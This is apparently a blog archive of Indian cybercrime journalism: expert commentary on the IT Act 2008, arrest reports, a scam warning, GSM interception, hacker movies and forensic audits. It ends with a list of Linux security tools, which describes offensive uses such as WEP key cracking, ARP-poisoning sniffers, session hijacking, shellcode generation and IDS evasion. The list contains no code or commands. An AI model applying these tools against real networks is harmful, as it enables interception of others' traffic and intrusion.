Analysts at Symantec pointed out that many of these attacks were offline. Vishal Dhupar, MD, Symantec India said, “We observed a number of malware components that were responsible for the attacks. W32.Dozer, Trojan.Dozer, W32.Mydoom.A@mm and W32.Mytob!gen work in tandem to both spread and attack.”

All these components of the attack are basically pieces of old malware code, which were bolted together to launch the attack. If these highly unsophisticated attacks were able to create such havoc, imagine what would happen if more sophisticated and better-coordinated attacks occur!

Yuval Ben-Itzhak, CTO of Finjan, opined, “The primary trend that we see is that hackers are using automatic tools to conduct crime. These automatic tools (toolkits) enable any person with some basic IT skills to start infecting online users with data-stealing malware within hours. Data stealing malware is what these criminals are using to cash out from their activities. They are selling the data they managed to steal online.”

Dr. Jose Nazario, Manager of Security Research, Arbor Networks, Inc. added, “We have seen, just like in the physical criminal world, criminals who specialize in different things: criminals who burgle houses, criminals who buy and sell stolen property; there are conmen online too. This kind of specialization has existed in the physical world for thousands of years. Now it has appeared in the online world as well. So you have division of labor, and specialization in the online crime world.”

Dr. Nazario said, “If you are able to do a complete investigation of all the various actors involved in online crime such as DDoS attacks, economic espionage, or financial fraud, there would be many different parties who are enablers at different points in the process just as the people who are enablers of a crime in the physical world.

Long-standing physical crime organizations have moved heavily into online crime as it is extremely lucrative when compared to similar efforts in the physical world and the risk of being caught is lower. Victims can be global as opposed to local in the physical world. So the vast majority of online crime today is organized crime and a big proportion of it is being committed by traditional organized criminals.”

Indian criminals learn the ropes
There are many small groups of cyber criminals in India. We have not yet seen the emergence of a cyber crime mafia. However, most small organized groups are located either in big cities or in small towns. This phenomenon hasn’t percolated to the countryside yet.

Most of these initially began as amateur activities and after tasting success, they went ahead with other cyber criminal activities. In the metros, and in the B class cities, we have seen the emergence of data brokers or data merchants who source data from people working with offshoring or outsourcing companies like the BPOs, KPOs and LPOs. Then these brokers go ahead and process the data before selling it. This is rampant.

Pavan Duggal, Advocate, Supreme Court of India and a noted cyber lawyer, said, “Cyber crime in India is going through a learning curve of maturity. Gone are the days when Indians would indulge in petty cyber crime activities such as defacing profiles or cyber stalking. What is emerging is a professional approach towards cyber crime.”

Cyber terrorism is another challenge in India. Ankit Fadia, an independent computer security and digital intelligence consultant, who is also a cyber terrorism expert, said, “During the investigations after the Mumbai attacks it was found that the terrorists were using VoIP to do all of their planning and communications. Before the Gujarat blasts, an e-mail was sent to a few news agencies in Mumbai. Both Gujarat and Mumbai police were inadequately equipped to track who sent the e-mail etc. I was working with the Gujarat police and the Navi Mumbai cyber cell department on both of these cases and after talking to them, I realized that they weren’t properly trained.

They asked me for tools and software that are basically downloadable from the Internet and that every hacker would know about. Together with my help and that of some other security consultants, we were able to track down the e-mail but then the problem was that the e-mail was sent from a Yahoo e-mail account and when the Mumbai cyber cell and ATS contacted Yahoo, it took about four-five days for Yahoo to get back on this as they needed approvals from their US office. This is too long a time when you are working on such a critical case.”

Indian Web sites are being hacked all the time just to demonstrate the vulnerabilities of these sites. Now with cyber terrorism coming in, although cyber terrorism has been termed a heinous offence with life imprisonment as the penalty, Duggal felt that many mechanisms needed to evolve pertaining to investigation and prosecution in cyber terrorism cases. It would be far better if India had a dedicated cyber crime force. Further, cyber crime related matters have to be given a fast track court rather than go to trial, a process that drags on for years.

According to Mikko Hypponen, Chief Research Officer, F-Secure Corporation, “India is not a major source of malware or cyber crime. However, it is a major target of such crime—mostly because of its size and emphasis on high tech. In the early days of computer viruses, India used to be a big source of viruses. Those were the days of hobbyist virus writers. Nowadays, the large-scale organized criminal malware attacks are coming from Russia, China and Brazil.”

That said, cyber crime is not local; it is international. The criminals are in country A, stealing money from victims in countries B, C and D through computers in countries E, F and G. In order to get the criminal arrested and sentenced, you need cooperation from the law enforcement authorities in all of these countries. That doesn’t happen as smoothly as it should.

Call for Internetpol
The Internet has no borders and online crime is almost always international, yet local police authorities often have limited resources for investigations. According to Hypponen, we should consider the creation of an online version of Interpol – ‘Internetpol’ that is specifically tasked with targeting and investigating the top of the crimeware food chain.

“I’m not holding my breath waiting for this to happen overnight. In my talks with international law enforcement, everybody agrees we need more info sharing and more co-operation. However, getting all the necessary countries on board will be hard. Then we have to take into account the possible resistance from people who think such a ‘Net police’ would be used to curb free speech or hunt peer-to-peer users when what we would really be after would be catching online criminal gangs,” Hypponen said.

According to Fadia, “An organization like an Internetpol, which is an international body that operates on cross-border investigations, is really required. The problem that every country faces today is that even if you get trained officials to do the investigations for a cyber crime case, if the criminal is in another country, even if the agencies have all the proof, for them to be able to contact the local police agencies in the other country to even arrest the person is nearly impossible. No international agencies like the UN or Interpol for Internet security currently exist. Every country wants to protect its own citizens; they would never cooperate in such an investigation.”

The IT Act 2008
In order to curb cyber crime and protect the country’s sovereign interests, the government has come up with the amended IT Act 2008. Duggal believed that while the amended Act has taken two steps forward, it has taken three steps back. So, while it has increased the coverage of cyber crimes in terms of covering crimes like cyber defamation, identity theft and cyber terrorism, the majority of cyber crimes, barring a few, have been made bailable.

Duggal said, “Once a person is out on bail, as a matter of right, he will immediately go and tamper with the electronic evidence. That being so, the chances of getting convictions in the cyber crime cases would further decrease. Therefore, to that extent, it is a piece of cyber crime friendly legislation.

Already statistics are not in India’s favor. We have got only four cyber crime convictions till date, which gives you an idea of how poor the law is. I think the actual number of convictions would further recede with the new cyber act because in any cyber crime case, conviction depends upon electronic evidence and if evidence is tampered with, there will be no conviction. Therefore, I think the law has gone soft on cyber criminals, except for cyber terrorism, which has been made a heinous offense.”

Duggal explained, “The amendments have deleted the term ‘hacking’ from the law. This will have a psychologically negative impact. Cyber criminals today feel that hacking has been deleted from the law. Moreover, I think this soft approach is sending out a loud message to the world that we are not focused on cyber crime. This would certainly hurt corporate India and the rate of growth of the Indian economy. So I think it would have been far better had the government gone for stringent punishments.

The world over, post 9/11, the focus has been on increasing the quantum of punishment for cyber crime in different jurisdictions. India is the only country that has acted to the contrary and reduced punishment for cyber crimes. For example, under section 67, publishing obscene electronic information was earlier punishable with five years imprisonment and a Rs. 1 lakh fine on the first conviction and 10 years imprisonment and a Rs 2 lakhs fine for the second conviction. This has now been reduced from five years to three years and from 10 to 5 years. Similarly, all other punishments have been reduced. This doesn’t make any sense.”

Government officials, however, beg to differ. According to a senior official, the quantum of punishment has not been reduced in most cases. He admits that most offences under the IT Act 2008 have been made bailable, but argues that this serves a purpose. Consider a scenario where your system is infected with a virus through the Internet or through an infected pen drive.

If you then send an e-mail to a company, the virus would be sent along with it and the company could press charges against you for causing harm to its systems. Though you did it unknowingly, you could be found guilty. If this offense were treated seriously with a high quantum of punishment, a large number of innocent people would get convicted. This is one reason why many offences have been made bailable under the amended IT Act.

Another reason for making the offences bailable is that, due to low awareness and knowledge about technology (amongst police, lawyers as well as judges), cyber crime related cases take a long time to resolve. In such cases, many petty offenders or innocent people are treated like hardcore criminals, which isn’t fair. That being said, a lot needs to be done to educate the law enforcement agencies about technology and cyber crime.

According to Jatin Sachdeva (CISSP, CISA), Information Security Specialist, Cisco India & SAARC, “As with any law, there is a constant need to evaluate relevance and context. Even with cyber crime laws in place in so many places around the world, it has not brought about the end of cyber crime. We believe that there is definitely more that can be done, and more importantly, more stakeholders to be brought into the ecosystem.”

Plan of action
Enhancing the law is one issue; the law then needs to be properly implemented. There must be appropriate orientation and awareness of how the law needs to be applied, and there need to be fast track courts. Another major problem is the non-citizen-friendly interface of the law enforcement agencies: getting an FIR registered is a herculean task in any cyber crime case.

It is time for India to provide for electronic FIRs. Similarly, the criminal justice system needs to be appropriately reformed in India to keep in sync with the changing realities of the electronic economy.

The Indian Computer Emergency Response Team (CERT-In) is working with state police forces to train them on cyber investigations and cyber crime. However, CERT-In has certain limitations and it is up to the state police to contact CERT-In as the latter is ready to give money for setting up cyber forensic labs.

CERT-In is also trying to educate school students about the Dos and Don’ts of the Internet and create awareness amongst them about cyber crime. This is currently being done in association with the Data Security Council of India, Nasscom and Google.

Sources from the government claim that India is well prepared to face any large-scale cyber attack. The government has also prepared a cyber crisis management plan, the contents of which are classified.

When it comes to enterprise security, things come down to deploying best current practices (BCPs). From the network, server and application standpoint, there are well-known BCPs out there that network operators, server administrators, Webmasters and so forth can follow to ensure that their systems and infrastructures are hardened against attacks.

Roland Dobbins, Solution Architect, Arbor Networks, opined, “A lot of these BCPs don’t consist of most of the things that you buy so much as the things that you do in your infrastructure. It requires time and effort to implement these things and a lot of folks for various reasons are under resourced and overworked so they don’t deploy these well-known best current practices that would not only make their sites more resilient against attacks but also provide greater visibility into the attacks and mitigate them.

One of the basic things that people can do is to ensure they have a virtual team comprising their networking staff, their sysadmins and their Web and database administrators, who can be called together and can work together. Another effective thing they need to do is to have an understanding of who their ISPs are and who their operational security contact is who can be reached if there is a problem.

There are a lot of reports where the folks didn’t know who their SPs were and how to go about contacting them. Many SPs offer commercial DDoS mitigation services that organizations can subscribe to. These act like insurance for your systems.”

All in all, we as a country need to develop a culture of security through proper training—be it at school level, college level or at organization level. As the Chinese philosopher, Confucius rightly said, “Success depends upon previous preparation, and without such preparation there is sure to be a failure.”



Reference : http://www.expresscomputeronline.com/20090803/market01.shtml

Kandivli businessman in connection with a cheating and hacking case

The cyber crime cell of the Bangalore police last week arrested a Kandivli businessman in connection with a cheating and hacking case registered there.

The accused, Yashwant Mairale (39), is a resident of Kandivli. Mumbai police sources confirmed that they assisted the Bangalore team, headed by S S Muddegowda, which had come in search of Mairale. He was produced before the Ballard Pier court by the Bangalore police, who sought his transfer warrant. He will be produced before the first class magistrate court in Bangalore on Friday.

The case pertains to a complaint of cheating by S Rangaswamy, a resident of Bangalore, who alleged that someone had hacked into his ICICI e-banking account and stolen Rs 2.50 lakh. When he checked the account in December last year, he was shocked to discover that Rs 2.50 lakh had been transferred into three accounts.

A case of cheating was registered by the Cantonment police. But as it pertained to a hacking offence, the case was transferred to the CID’s cyber cell. During investigations, the police found that one of the beneficiaries, Sukresh Das, had an account at the SBI’s branch in West Bengal.

But the police were unable to trace any such person. However, they found that Rs 50,000 had been transferred into Mairale’s account in Mumbai.

With internet users becoming aware about email scams, fraudsters have upped their game and are using ingenious methods to extract money from unsuspecting netizens.

The latest fraud email doing the rounds lists the Federal Bureau of Investigation (FBI) as the sender. The email offers to refund money you may have lost in an internet fraud in the past. But don’t hit the ‘reply’ button with your personal details. All these emails are fake. To make the emails look authentic, the fraudsters have provided the address of the FBI headquarters at Washington DC along with the investigating department. The National Association of Software and Service Companies (Nasscom) has written to the FBI, asking the agency to look into the matter.


The email is written by one Thomas Green who claims to be an agent with the FBI’s Internet Crime Complaint Center. The email states that six people have been arrested in connection with an email fraud, where they duped recipients into parting with money. A part of the amount, approximately US $2.5 lakh, has been recovered and can be refunded to the fraud victims through an ATM card, the email states. The card will be dispatched after the recipient provides personal information to another agent, Fredy Simon, the email adds.

“A month ago, I received a similar email, where the sender said he represented the United Nations and a committee had been created to refund money to victims of a phishing fraud. The email carried the UN logo and pictures of the secretary-general,” said technology evangelist Vijay Mukhi. “It’s best to delete such emails,” he added.

“This is a variation of the Nigerian scam,” said Pratap Reddy, director of cyber security at Nasscom. “If you haven’t lodged a police complaint, there’s no question of being contacted by an agency. If a complaint has been lodged, then a foreign agency like the FBI will have to go through proper diplomatic channels such as the Interpol. State CID is the nodal agency that would co-ordinate. The FBI will never approach an Indian citizen directly,” Reddy added.

Jealous colleague turns to Orkut for revenge, arrested

Accused Anand Bilore created a fake profile of his workmate on the social networking site, and sent obscene messages from it to female colleagues in the company

There is nothing called healthy competition at the workplace. Especially if at stake is a coveted ‘best employee’ award, a promotion and the promise of a better life.

Allegedly driven by professional jealousy, an assistant manager with Kotak Life Insurance created a fake Orkut profile of his colleague with the intention of discrediting him. Thane’s Cyber Crime Cell arrested him and his associate on Tuesday after he used the social networking profile to send obscene messages to female colleagues. The accused, Anand Ishwar Bilore, 21, and his associate, Vishal Changani, 23, an estate agent, are from Chembur.

A Cyber Crime Cell officer said, “Bilore was working with the insurance company for the last couple of years while Nirmale joined only recently. Nirmale’s meteoric rise in the organisation obviously did not go down well with Bilore, especially after he won the best employee award and was promoted to the post of assistant manager.”

“In order to embarrass his colleague, Bilore allegedly created his fake profile on Orkut from his friend Changani’s computer,” said Chandrakant Joshi, senior police inspector of the Cyber Cell.

“The accused scrapped all his female employees in the organisation and also sent them vulgar messages. When the women cross-checked with Nirmale he clarified his stand and lodged a complaint,” Joshi added.

Nirmale’s father Balasaheb said, “My son was upset when his female colleagues complained to him about the lurid messages. He was doing well at work, which I think upset Bilore as he belonged to a rival clique.”

On investigating, the police discovered that the computer belonged to Changani who was then arrested. Changani then informed the police about Bilore’s involvement.

Both were booked under the Information Technology Act and were let off on bail.

“Strict disciplinary action is being taken against the erring individual. We place high emphasis on ethical conduct in personal and professional dealings of employees and misdemeanors of any sort are not tolerated,” said Sugata Dutta, Head of Human Resources, Kotak Life Insurance.

CYBER COPS CRACK RS 65K FRAUD

Duo hacks website, books int’l tickets

Mumbai: Two persons hacked into the website of an authorised travel agent of a domestic airline, causing a loss of more than Rs 65,000 to the latter. But their fraud was detected and they ended up in the police net.

The two hacked into the website of an Andheri travel agent of Indigo Airlines. They booked international tickets that caused a loss to Indigo Airlines to the tune of Rs 65,152. However, the duo was nabbed by the cyber police on Tuesday. The two accused, who have been identified as Prashant Amarnarayan Jha (36) and Sudipkumar Sinha (30), have been booked under the Information Technology Act of 2000 and have been remanded to police custody. While Jha is a resident of Nallasopara, Sinha is his associate and a resident of Marol in Andheri.

According to the police, the complaint was filed by one Arun Shetty who is the authorised ticket agent of Indigo Airlines having an office under the name of Ramkrishna Travels and Tours in Andheri.

Shetty was shocked recently when the airline furnished him with an extra bill for a few international tickets which he had not issued. During the course of investigations, it came to light that somebody had hacked into the website of the travel agent and issued two international air tickets. The cyber police traced the IP address to Nalasopara. The police raided Jha’s residence and arrested him.

Tap mobiles with a $1,500 device now

A computer security researcher has built a device for just $1,500 that can intercept some kinds of cell phone calls and record everything that’s said.

The attack Chris Paget showed illustrates weaknesses in GSM, one of the world’s most widely-used cellular communications technologies. His attack was benign; he showed how he could intercept a few dozen calls made by fellow hackers in the audience for his talk at the Defcon conference here.

But it illustrates that criminals could do the same thing for malicious purposes, and that consumers have few options for protecting themselves.

Paget said he hopes his research helps spur adoption of newer communications standards that are more secure.

“GSM is broken — it’s just plain broken,” he said. GSM is considered 2G, or “second generation,” cellular technology. Phones that run on the newer 3G and 4G standards aren’t vulnerable to his attack.

If you’re using an iPhone or any other smart phone and the screen shows that your call is going over a 3G network, for example, you are protected. Blackberry phones apply encryption to calls that foil the attack, Paget pointed out.

But if you’re using a type of phone that doesn’t specify which type of network it uses, those phones are often vulnerable, Paget said. Paget’s device tricks nearby cell phones into believing it is a legitimate cell phone tower and routing their calls through it.

Man arrested for mailing ex-colleague’s ‘lewd’ pics

Mumbai: The cyber crime cell of Mumbai police on Wednesday arrested a 23-year-old executive working for a multinational company in Andheri for allegedly hacking into his ex-colleague’s email ID and sending morphed obscene pictures of her to her friends.

The accused, Prashant Vilas Desai, was arrested after the police tracked down the IP address to his laptop. “We have booked Desai on charges of cheating, breach of trust and Sections of the Information Technology Act. He has been remanded in police custody,” said a cyber crime cell official.

The 22-year-old victim worked as an administrative assistant with the same company where Desai was employed. Desai was attracted to her. Though she treated him like a friend, Desai mistook her actions and approached her parents with a marriage proposal, the official added.

The victim’s parents turned his proposal down. Soon after, he allegedly started stalking her. He would call her repeatedly and send her emails. “She left that organization and joined another company as sales coordinator. On May 26, Desai called her mother up and told her that she was sending him emails expressing her love for him. Later, he even showed her mother printouts. The victim’s mother told her to close the email account and start a fresh one,” the officer said.

“On June 21, some of her friends informed the victim that someone had sent obscene pictures of her from her email, giving out her details and phone number. When the victim logged into her account, she was shocked to see the emails,” the officer said.

Sunday, November 7, 2010

Friday, November 5, 2010

My Favorite Hacker Movies

Hacker living in Russia, gets tied into the mafia.
Takedown
Avoid at all cost. It's a piss poor movie and full of lies. Look up "Freedom Downtime", a documentary on the 'Free Kevin' movement. You'll quickly understand.

Untraceable
Quite a well-made hacker movie, and thrilling. It also shows how the FBI cybercrime unit tracks the target site.

Serial Experiments: Lain
A 13-part Japanese anime series made for TV. More about philosophy and conspiracy theory than hacking, but everything revolves around computers and the internet.

Code Hunter
Low budget flick with hacking, VR and AI. Preposterous but still enjoyable.

Die Hard 4
This is a very good hacking-based movie. I am very impressed by this movie and I also want to become a hacker.

Cloak and Dagger
A classic! I watched this several times as a kid. War Games is still number 1 though.

The Bourne Ultimatum
The CIA needs to hack the mail server of a newspaper (The Guardian UK) to read the email of a reporter they assassinated. So they turn to Nmap and Zenmap GUI to hack the mail server.

The Girl with the Dragon Tattoo
Based on the internationally bestselling novel by Stieg Larsson, this film follows Lisbeth, a troubled young hacker suffering from Asperger syndrome and a history of abuse by authority figures, as she works with a journalist trying to solve a 40-year-old murder mystery.

Khottabych
A teenage hacker (Gena) uses Nmap and Telnet to deface microsoft.com. Microsoft and the US authorities are understandably upset by the attack, so they send the attractive female hacker Annie to flush him out. The movie also features an epic battle between powerful genies (the kind which come in a bottle) fighting for dominion over Earth.

The Listening
A former NSA officer defects and mounts a clandestine counter-listening station high in the Italian Alps. Nmap and NmapFE can be seen in action.

Battle Royale
One of the students is a hacker, and can be seen referencing Nmap source code.

Hackers
Perhaps this is not a good movie if you're a real hacker, but personally I thought it was awesome!

Cypher
I suppose I would add the movie Cypher as a notable mention. It's a decent sci-fi flick with what were supposed to be Matrix influences. No hacking per se, except loading viruses.

Friday, October 29, 2010

Corporate Digital Forensic Audits

With the prevalence of companies providing employees with mobile phones & computers, there may be a possibility that misuse of the equipment may create additional costs to the employer. Examples of these may be:

• Using hand-held devices to access the internet and email for personal use and time-wasting during working hours. This may involve accessing social networking websites, such as Facebook, or monitoring online auctions on sites such as eBay.
• Viewing and/or downloading inappropriate material, images or videos using a computer or hand-held device.
• Downloading pirated media files and software.
• Receiving an unacceptable quantity of personal telephone calls and text messages via mobile phone. These will not be displayed on the phone bill.
• Removing sensitive company data from the workplace using the digital device.
• Bullying or using unacceptable language in emails and text messages.

All of the above examples can bear a financial cost for the organisation as well as a possible negative effect on company reputation and credibility:

• If an employee were caught by the relevant authorities downloading illegal software, for example, then the company could suffer bad publicity and loss of credibility in the marketplace.
• If an individual were caught downloading illegal pornographic images on a company hand-held device or computer, there is a strong possibility that law enforcement would confiscate all company digital equipment for forensic analysis. This could cause temporary business closure and bad publicity, along with loss of business and reputation.
• Distractions and time-wasting through web-surfing, spending time in chat rooms, online social networking, watching streaming video and emailing.
• Excessive mobile phone bills from an unreasonable number of personal calls and text messages.

Forensics can provide a regular audit of digital devices that would help reduce company operating costs and help preserve company reputation. We provide a spot-checking service to companies to:

• Help control costs and increase productivity.
• Reduce time-wasting.
• Improve computer security – illegal downloading can often attract malware and viruses and therefore compromise company security and increase downtime.
• Help preserve company reputation and business continuity.

To enable this process, our recommendation is that a spot-check of devices is carried out by us, rather than an analysis of all equipment, which would prove expensive and impractical. The number of devices analysed would be relative to the size of the business. For example, for a business with, say, 12 mobile phones and 8 laptops we could analyse 2 phones and 1 laptop, but there is no hard and fast rule for this. We would produce a forensic report for each device after analysis. The forensic equipment we use is equal to some of that used by law enforcement agencies, and we work to the Association of Chief Police Officers Guidelines with regard to laboratory procedures, handling of evidence, audit trails and report generation.

What is particularly important is that the company employees are fully aware that an audit of devices is being carried out and that it will happen again in the near future.

• This will make employees more vigilant and less likely to misuse company equipment.
• There should be a reduction in phone bills, particularly for staff who may be making excessive personal communications.

The fact that an audit process that appears random to employees is being carried out periodically should help regulate use of company computers and hand-held devices. The fear of being “found out” may make employees think twice about how they use equipment, maintain focus on work and reduce distractions. We recommend that audits are carried out at least once a year and that they are not done on the same date each year, to help increase the element of surprise.

Tuesday, August 31, 2010

Linux needed tools

Linux Tools

ADMsnmp – SNMP audit scanner
aide – AIDE (Advanced Intrusion Detection Environment) is a free replacement for Tripwire(tm). It generates a database that can be used to check the integrity of files on a server. It uses regular expressions for determining which files get added to the database. You can use several message digest algorithms to ensure that the files have not been tampered with.
airsnort – AirSnort is a tool for wireless LANs which recovers encryption keys by passively monitoring transmissions, computing the encryption key when enough packets have been gathered. Works on both 40 and 128 bit encryption. Many weaknesses in the WEP 802.11 protocol are discussed here. AirSnort is the first publicly available implementation of this attack. Once enough packets have been gathered, AirSnort can guess the encryption password in under a second.
amap – Amap is a scanning tool that allows you to identify the applications that are running on (a) specific port(s). It does this by connecting to the port(s) and sending trigger packets. These trigger packets will typically be an application protocol handshake (e.g. SSL). Amap then looks up the response in a list and prints out any match it finds. Adding new response identifications can be done just by adding them to an easy-to-read text file. With amap, you will be able to identify that SSL server running on port 3445 and some Oracle listener on port 233!
argus-client & argus server – Argus is a generic IP network transaction auditing tool; it enables a site to generate comprehensive network transaction audit logs, allowing user to perform extensive analysis of network traffic.
arpd – rarpd v1.0 is a Reverse Address Resolution Protocol Daemon. rarpd listens on the ethernet for broadcast packets asking for reverse address resolution. These packets are sent by hosts at boot time to find out their IP address.
arping – Arping is an arp level ping utility which broadcasts a who-has ARP packet on the network and prints answers. Very useful when you are trying to pick an unused IP for a net that you don’t yet have routing to.
arpwatch – Arpwatch is a tool that monitors ethernet activity and keeps a database of ethernet/ip address pairings. It also reports certain changes via email. Arpwatch requires tcpdump and libpcap. Includes FDDI support, updated ethercodes, uses autoconf.
autopsy – The Autopsy Forensic Browser is an HTML-based graphical interface to The [at]stake Sleuth Kit (TASK). Together, TASK and Autopsy Forensic Browser are an open source alternative to the common Windows-based digital forensic tools. Autopsy provides an investigator with an HTML-based graphical interface that allows one to browse images from compromised systems in a “File Manager”-like interface. Windows and UNIX file systems can be analyzed to view deleted files, create time lines of file activity, and perform key word searches.
babelweb – Babelweb is a program which allows to automate tests on a HTTP server. It is able to follow the links and the HTTP redirect but it is programmed to remain on the original server.
bfbtester – BFBTester is a utility for doing quick, proactive security checks of binary programs by performing checks of single and multiple argument command line overflows and environment variable overflows. It will also watch for tempfile creation activity to alert the user of any programs using unsafe tempfile names. While BFBTester can not test all overflows in software, it is useful for detecting initial mistakes that can red flag dangerous software.
biew – Biew is a Binary vIEWer with a built-in editor for binary, hexadecimal and disassembler modes. It contains a PentiumIII/K7Athlon/Cyrix-M2 disassembler, full preview of MZ, NE, PE, LE, LX, DOS.SYS, NLM, arch, ELF, a.out, coff32, PharLap, and rdoff executable formats, a code guider, a text viewer with Russian codepage support, and many other features.
bing – Bandwidth Ping. Estimates bandwidths between network hosts and routers.
cabextract – a program to extract Microsoft cabinet (.CAB) files.
cflow – Reads and analyzes flow files
cheops – Cheops is a network “swiss army knife”. It’s a combination of a variety of network tools to provide system administrators and users with a simple interface to managing and accessing their networks. Cheops aims to do for the network what the file manager did for the filesystem. Features include: network mapping via UDP and/or ICMP packets, port detection using half-open TCP connections (à la halfscan), OS detection using invalid flags on TCP packets (à la queso), domain scans, ICMP pings, and much more.
chkrootkit – checks for signs of a rootkit. Includes ifpromisc.c to check and see if the interface is in promisc mode, chklastlog.c to check lastlog for deletions, and chkwtmp.c to check wtmp for deletions. Tested on Linux 2.0.x, 2.2.x and FreeBSD 2.2.x, 3.x and 4.0. Changes: lrk5 detection, Sun/Solaris support, and Red Hat fixes.
chntpw – NT SAM password recovery utility
cmospwd – CmosPwd decrypts the password stored in CMOS that is used to access BIOS SETUP.
cracklib2 – A pro-active password checker library
cryptcat – Cryptcat is an encrypted version of netcat. It uses AES encryption and a static key to encrypt all transactions. Previous versions had a flaw in which not all network traffic was encrypted so this is the patched version.
darkstat – Darkstat is an ntop-workalike network statistics gatherer. Built to be faster and smaller than ntop, it uses libpcap to capture network traffic and serves up Web page reports of statistics such as data transferred by host, port, and protocol. It also has a neat bandwidth usage graph.
dcetest – tool which probes a Windows machine over TCP port 135, dumping MSRPC endpoint information. It can be thought of as the equivalent of rpcinfo -p against a Windows box. Dcetest can also be very useful once inside a DMZ to fingerprint Windows machines on the network.
dcfldd – Enhanced DD imager with built in hashing. Works like dd from command line.
dd_rescue – Like dd, dd_rescue copies data from one file or block device to another. You can specify file positions (called seek and skip in dd).
dlint – Dlint analyzes any DNS zone you specify and reports any problems it finds by displaying errors and warnings. Then it descends recursively to examine all zones below the given one (this can be disabled with a command-line option).
dnswalk – dnswalk is a DNS database debugger. It works by initiating a zone transfer of a current zone, inspecting individual records for inconsistencies with other data, and generating warnings and errors. It is not a parser of DNS datafiles, it works strictly via existing DNS query methods on a “live” system (however dnswalk can be run on a separate nameserver which has data ready to move into production).
driftnet – Driftnet is a program which sniffs network traffic and picks out images from TCP streams it observes. It is interesting to run it on a host which sees a lot of web traffic. Changes: This release fixes problems with building in adjunct-only mode. There are performance enhancements.
dsniff – dsniff is a suite of utilities that are useful for penetration testing. It consists of the following programs: arpredirect intercepts packets from a target host on the LAN intended for another host on the LAN by forging ARP replies. findgw determines the local gateway of an unknown network via passive sniffing. macof floods the local network with random MAC addresses. tcpkill kills specified in-progress TCP connections. dsniff is a simple password sniffer which handles many protocols. mailsnarf outputs all messages sniffed from SMTP traffic in Berkeley mbox format. webspy sends URLs sniffed from a client to your local Netscape browser for display, updated in real-time. Changes: Added parsing for Napster, AIM, ICQ (v2, v5), and CVS pserver. Now supports more non-glibc Linux systems missing ether_ntoa(). Unique HTTP authentication information by directory is now supported. dsniff now skips IMAP command tag, and doesn’t rely on /etc/services.
echoping – echoping is a small program to approximately test the performance of a remote host by sending it TCP “echo” packets. It is able to use the following protocols: echo, discard, chargen, HTTP (with SSL if you wish), ICP, and SMTP. It uses UDP instead of TCP for the protocols which accept it (like echo), it can repeat the test and display various statistics, and it can use T/TCP on systems which support it. Changes: SSL (Secure Sockets Layer) support, and a new ability to read many bytes at a time for a big performance improvement.
etherape – Etherape is an etherman clone which displays network activity graphically. Active hosts are shown as circles of varying size, and traffic among them is shown as lines of varying width. It is GNOME and pcap based. Changes: Much better now.
ethereal – Ethereal is a GTK+-based network protocol sniffer / analyzer
ettercap – Ettercap is a network sniffer/interceptor/logger for switched LANs. It uses ARP poisoning and the man-in-the-middle technique to sniff all the connections between two hosts. Features character injection in an established connection – you can inject characters to the server (emulating commands) or to the client (emulating replies) while keeping the connection alive! Integrated into an easy-to-use and powerful ncurses interface.
farpd – Fake ARP user space daemon. This ARP daemon replies to any ARP request for a set of IP addresses with the hardware MAC address of one of the interfaces of the server after determining that no other host in the network is claiming that IP.
fatback – Analyze and recover deleted FAT files from Linux
fenris – Fenris is a multipurpose tracer, stateful analyzer and partial decompiler intended to simplify bug tracking, security audits, code, algorithm, protocol analysis and computer forensics by providing a structural program trace, general information about internal constructions, execution path, memory operations, I/O, conditional expression info, and much more.
flawfinder – Flawfinder searches through source code for potential security flaws, listing potential security flaws sorted by risk, with the most potentially dangerous flaws shown first. This risk level depends not only on the function, but on the values of the parameters of the function.
fping – Fping is a ping(1) like program which uses the Internet Control Message Protocol (ICMP) echo request to determine if a host is up. fping is different from ping in that you can specify any number of hosts on the command line, or specify a file containing the lists of hosts to ping. Instead of trying one host until it timeouts or replies, fping will send out a ping packet and move on to the next host in a round-robin fashion. If a host replies, it is noted and removed from the list of hosts to check. If a host does not respond within a certain time limit and/or retry limit it will be considered unreachable. Unlike ping, fping is meant to be used in scripts and its output is easy to parse.
fragroute – Fragroute intercepts, modifies, and rewrites egress traffic destined for a specified host, implementing most of the attacks described in the Secure Networks “Insertion, Evasion, and Denial of Service: Eluding Network Intrusion Detection” paper of January 1998. It features a simple ruleset language to delay, duplicate, drop, fragment, overlap, print, reorder, segment, source-route, or otherwise monkey with all outbound packets destined for a target host, with minimal support for randomized or probabilistic behavior. Includes scripts to defeat even the current CVS snort IDS.
freeswan – Linux FreeS/WAN provides IPSEC (IP Security, which is both encryption and authentication) kernel extensions and an IKE (Internet Key Exchange, keying and encrypted routing daemon) as well as various rc scripts and documentation. This lets a bright Linux sysadmin build VPN gateways out of even old 584 and 486 PC clone boxes. The 1.00 version is known to inter-operate with other IPSEC and IKE systems already deployed by other vendors such as OpenBSD.
gdb – the GNU Project debugger, allows you to see what is going on `inside’ another program while it executes — or what another program was doing at the moment it crashed.
gnupg – GnuPG is a complete and free replacement for PGP. Because it does not use IDEA or RSA it can be used without any restrictions. GnuPG is a RFC2440 (OpenPGP) compliant application.
grenzgaenger – SOCKS-like hacker tool for tunneling nmap, netcat and exploits transparently through systems into protected networks
gtkrecover – gtkrecover is a GUI for recover, a program that undeletes files on ext2 partitions. You can search for deleted files.
hackbot – host exploration tool and banner grabber. It scans hosts for FTP banners, SSH banners, Open Relays, EXPN and VRFY options, more than 200 common CGI vulnerabilities and common indexable directories, NT unicode vulnerabilities and NT nimda infections.
hammerhead – A stress testing tool designed to test out your web server and web site. It can initiate multiple connections from IP aliases and simulate numerous (256+) users at any given time. The rate at which Hammerhead attempts to pound your site is fully configurable, and there are numerous other options for trying to create problems with a web site (so you can fix them).
hellkit – Hellkit is a shellcode generator. You write your shellcode in C, and it gets converted to ASM for use with both heap and stack based overflows. Many examples included. Changes: Added generic shellcode decoder which can handle shellcode up to 64kb in length containing any bytes, added encoder for this type of decoder, and fixed some signedness issues in array access.
hjksuite – collection of programs for hijacking. First of all it contains hjklib, a library for hijacking. It also contains some programs like hjkbnc, which allows IRC hijacking directly with your client, hjkhttpd for hijacking HTTP sessions, and hjknetcat, for hijacking text connections.
hping2 – Hping is software to do TCP/IP stack auditing, to uncover firewall policy, to scan TCP ports in a lot of different modes, to transfer files across a firewall, test network performance, test if TOS is handled, etc.
httptunnel – httptunnel creates a bidirectional data channel through an HTTP proxy, from your isolated computer behind a restrictive firewall, to a system on the Internet you have access to.
httpush – HTTPush aims at providing an easy way to audit HTTP and HTTPS application/server security. It supports on-the-fly request modification, automated decision making and vulnerability detection through the use of plugins, and full reporting capabilities.
